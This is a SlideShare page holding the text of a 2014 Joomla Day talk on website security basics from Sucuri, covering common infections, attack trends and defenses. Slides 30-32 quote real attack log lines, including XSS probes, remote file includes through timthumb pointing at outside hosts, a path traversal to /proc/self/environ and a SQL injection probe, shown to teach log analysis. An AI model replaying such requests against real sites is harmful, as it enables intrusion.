JoomlaWebsite Security
 Organization
 Sucuri, Inc.
 Co-Founder
 Chief Operating Officer
 @sucuri_security
 @perezbox
 Specialization:
 We...
 Website Security Company
 GlobalOperations
 PlatformAgnostic (i.e., Joomla,WordPress, etc..)
 Scan 2M Unique Domains ...
 Trends
 Threats
 Defenses
4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 4
SIMPLE RIGHT?
Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta4/4/2014 5
4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 6
Malicious Links
2011
2012
4/4/2014 Tony Perez | @perezbox | @sucuri_security |#JoomlaDayAtlanta 7
Known Malware
Unkown Malware
4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 8
Not Infected
Infected
4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 9
26%
19%
16%
14%
11%
4%
10%
Remote iFrame
Includes
Remote
JavaScript
Includes
SPAM
Injections
Obfuscated /
Encoded
JavaScri...
4/4/2014 Tony Perez | @perezbox | @sucuri_security | #wordsesh 11
Apache SSH
Email
Server
 Going Deeper than the applicat...
 Stick With Reputable
Sources
 Generating SPAM
emails, resource hogs
 IP blacklisting
4/4/2014 Tony Perez | @perezbox |...
4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 13
 Pharmacy
 Payday Loans
4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 14
4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 15
 ExploitingAccess Control
 Brute Force Attacks
4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 16
Site 1
Site 2Site 3
Site 4
4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 17
4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 18
4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 19
4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 20
4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 21
4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 22
4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 23
4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 24
4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 25
 Explosion in the Malware
as a Service (MaaS) trade
 Yes, pay someone to hack
for you
 Different tools to break
in and ...
4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 27
4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 28
4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 29
 Use for malware?
 Burrow into network?
 Stea...
4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 30
38.123.140.6 - - [18/Feb/2013:18:23:23 -0500] "G...
[02/Apr/2013:00:32:58 -0400] "GET /results/wp-content/themes/Convertible/timthumb.php?src=http%3A%2F%2Fflickr.easyneffecti...
4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 32
62.122.71.181 - - [03/Apr/2013:05:24:22 -0400] "...
4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 33
4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 34
 http://forum.joomla.org/viewtopic.php?t=795946
4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 35...
 Brand Reputation
 Legal Implications
 Impact to Sales
 Blacklisted by Search
Engines
 Blacklisted by Payment
process...
4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 37
 Sucuri properties
suffer:
 ~125,000 web based
attacks a month on
average
 ~4,000 attacks a day
▪ This spikes on occasi...
 Principles
 Access Control
 Vulnerabilities
4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 39
“It’s about risk reduction… risk will never be
zero…”
4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlan...
“…a concept in which multiple layers of security
controls (defenses) are placed throughout an
information technology (IT) ...
 Passwords
4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 42
Complex – Long - Unique
“requires that in a particular abstraction layer
of a computing environment, every module
(such as a process, a user or a ...
4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 44
4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 45
 PHP Execution, disable it:
 Cache
 Tmp
 Mod...
4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 46
4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 47
4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 48
4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 49
1. Fix index.php file and assume all is fine.
1. Panic your way into Joomla! Forums after hack.
1. Don’t worry about updat...
4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 51
Name Tool
Sucuri Blog http://blog.sucuri.net
Suc...
4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 52
Upcoming SlideShare
Loading in …5
×

Joomla! Day Atlanta 2014 - Website Security - The Basics

2,314 views

Published on

There are many posts, links, sources for website security, we unfortunately look over the basics as if somehow it were no longer important. The fact of the matter is that the basics will often save website owners a lot of headaches. This presentation hopes to go back to the basics and provide a foundation from which all website owners, specifically Joomla ones, can build from. A lot of the concepts though are applicable across all platforms and can found to be very platform agnostic.

For more information contact us at http://sucuri.net

Published in: Technology, News & Politics
0 Comments
2 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
2,314
On SlideShare
0
From Embeds
0
Number of Embeds
558
Actions
Shares
0
Downloads
18
Comments
0
Likes
2
Embeds 0
No embeds

No notes for slide

Joomla! Day Atlanta 2014 - Website Security - The Basics

  1. 1. JoomlaWebsite Security
  2. 2.  Organization  Sucuri, Inc.  Co-Founder  Chief Operating Officer  @sucuri_security  @perezbox  Specialization:  Website Security  Incident Handling  Log Analysis  Special Interests:  Working Out  Brazilian JiuJitsu Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta4/4/2014 2
  3. 3.  Website Security Company  GlobalOperations  PlatformAgnostic (i.e., Joomla,WordPress, etc..)  Scan 2M Unique Domains a Month  Block 4M web attacks a Month  Remediate 400 – 500 websites a day  Signature / Heuristic Based  24/7 operations 4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 3
  4. 4.  Trends  Threats  Defenses 4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 4 SIMPLE RIGHT?
  5. 5. Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta4/4/2014 5
  6. 6. 4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 6 Malicious Links 2011 2012
  7. 7. 4/4/2014 Tony Perez | @perezbox | @sucuri_security |#JoomlaDayAtlanta 7
  8. 8. Known Malware Unkown Malware 4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 8
  9. 9. Not Infected Infected 4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 9
  10. 10. 26% 19% 16% 14% 11% 4% 10% Remote iFrame Includes Remote JavaScript Includes SPAM Injections Obfuscated / Encoded JavaScript Conditional Redirects Defacements Other 4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 10
  11. 11. 4/4/2014 Tony Perez | @perezbox | @sucuri_security | #wordsesh 11 Apache SSH Email Server  Going Deeper than the application layer, targeting the server.  Server Polymorphism – a.k.a changes a lot
  12. 12.  Stick With Reputable Sources  Generating SPAM emails, resource hogs  IP blacklisting 4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 12
  13. 13. 4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 13
  14. 14.  Pharmacy  Payday Loans 4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 14
  15. 15. 4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 15  ExploitingAccess Control  Brute Force Attacks
  16. 16. 4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 16 Site 1 Site 2Site 3 Site 4
  17. 17. 4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 17
  18. 18. 4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 18
  19. 19. 4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 19
  20. 20. 4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 20
  21. 21. 4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 21
  22. 22. 4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 22
  23. 23. 4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 23
  24. 24. 4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 24
  25. 25. 4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 25
  26. 26.  Explosion in the Malware as a Service (MaaS) trade  Yes, pay someone to hack for you  Different tools to break in and generate payloads  Brute force and vulnerability exploits Malware Payloads  Blackhole Exploit Kit – Today’s market leader  2013 – SophoLabs 4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 26
  27. 27. 4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 27
  28. 28. 4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 28
  29. 29. 4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 29  Use for malware?  Burrow into network?  Steal data? What kind of website do you have?
  30. 30. 4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 30 38.123.140.6 - - [18/Feb/2013:18:23:23 -0500] "GET /cgi-bin/viewcvs.cgi/?cvsroot=<script>foo</script> HTTP/1.1" 302 227 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)" 123.151.39.41 - - [18/Mar/2013:16:20:12 -0400] "GET /art/all/animals/%3C%2Fscript%3E%3Cimg+src%3D%40+onerror%3Dalert%287872%29+%2F%3E HTTP/1.1" 404 268  Stored  Reflective
  31. 31. [02/Apr/2013:00:32:58 -0400] "GET /results/wp-content/themes/Convertible/timthumb.php?src=http%3A%2F%2Fflickr.easyneffective.com%2Fcrotz.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0” 83.170.99.221 - - [03/Apr/2013:13:03:16 -0400] "GET /results/chinchedbistro.com&amp;sa=U&amp;ei=vGBcUYS1IcOaiQLxu4HIBg&amp;ved=0CCYQFjAE&amp;usg=AFQjCNFN1APEnX9- WPS337kMyPUz0yDM8A/wp-content/themes/vulcan/lib/scripts/thumb.php?src=http://wordpress.com.4creatus.com/info.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6” 82.98.131.101 - - [03/Apr/2013:12:59:56 -0400] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" 4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 31
  32. 32. 4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 32 62.122.71.181 - - [03/Apr/2013:05:24:22 -0400] "GET //?malware-999.9+union+select+0-- HTTP/1.1" 200 26336 "-" "Mozilla/5.0 (Windows NT;en-us) Firefox/3.5.9”
  33. 33. 4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 33
  34. 34. 4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 34
  35. 35.  http://forum.joomla.org/viewtopic.php?t=795946 4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 35 -Autson Skitter Slideshow (mod_AutsonSlideShow) The malicious code is located in the "tmpl" folder, in the php file(s). - ShareThis for Joomla! (mod_JoomlaShare This) The malicious code is located in mod_JoomlaShare This.php. -VirtueMart Advanced Search (mod_virtuemart_advsearch) The malicious code is located in mod_virtuemart_advsearch.php. -AddThis For Joomla (mod_AddThisForJoomla) The malicious code is located in mod_AddThisForJoomla.php. - Plimun Nivo Slider (mod_PlimunNivoSlider) The malicious code is located in the "tmpl" folder, in the php file(s).
  36. 36.  Brand Reputation  Legal Implications  Impact to Sales  Blacklisted by Search Engines  Blacklisted by Payment processors  Worst Day Of your Life 4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 36
  37. 37. 4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 37
  38. 38.  Sucuri properties suffer:  ~125,000 web based attacks a month on average  ~4,000 attacks a day ▪ This spikes on occasion  Doesn’t include server level attacks  All flavors of attacks 4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 38
  39. 39.  Principles  Access Control  Vulnerabilities 4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 39
  40. 40. “It’s about risk reduction… risk will never be zero…” 4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 40
  41. 41. “…a concept in which multiple layers of security controls (defenses) are placed throughout an information technology (IT) system. Its intent is to provide redundancy in the event a security control fails or a vulnerability is exploited…” 4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 41
  42. 42.  Passwords 4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 42 Complex – Long - Unique
  43. 43. “requires that in a particular abstraction layer of a computing environment, every module (such as a process, a user or a program depending on the subject) must be able to access only the information and resources that are necessary for its legitimate purpose.” 4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 43
  44. 44. 4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 44
  45. 45. 4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 45  PHP Execution, disable it:  Cache  Tmp  Modules  Components  Images  http://blog.sucuri.net/2013/08/joomla-media- manager-attacks-in-the-wild.html <Files *.php> Deny from all </Files>
  46. 46. 4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 46
  47. 47. 4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 47
  48. 48. 4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 48
  49. 49. 4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 49
  50. 50. 1. Fix index.php file and assume all is fine. 1. Panic your way into Joomla! Forums after hack. 1. Don’t worry about updating. 1. Trust third-party extensions. 1. Apply all upgrades on live site. 1. Install and forget, all is well with your new site. 1. Use the same username and password for everything. 1. Don’t waste time making security adjustments to PHP and settings. 1. No regular backups required. 1. Use the cheapest host. 4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 50
  51. 51. 4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 51 Name Tool Sucuri Blog http://blog.sucuri.net SucuriTV http://sucuri.tv Malware Scanner http://sitecheck.sucuri.net Malware Scanner http://unmaskparasites.com Badware Busters https://badwarebusters.org Google Forums http://productforums.google.com/forum/#!categories/webmasters/malware--hacked- sites GoogleWebmasterTools http://support.google.com/webmasters/bin/answer.py?hl=en&answer=163633 Secunia SecurityAdvisories http://secunia.com/community/advisories/search/?search=wordpress Exploit-DB http://www.exploit- db.com/search/?action=search&filter_description=Wordpress&filter_platform=31 Joomla! Security and Performance FAQs http://docs.joomla.org/Security_and_Performance_FAQs Joomla! Security Checklist http://docs.joomla.org/Security_Checklist/Getting_Started
  52. 52. 4/4/2014 Tony Perez | @perezbox | @sucuri_security | #JoomlaDayAtlanta 52

×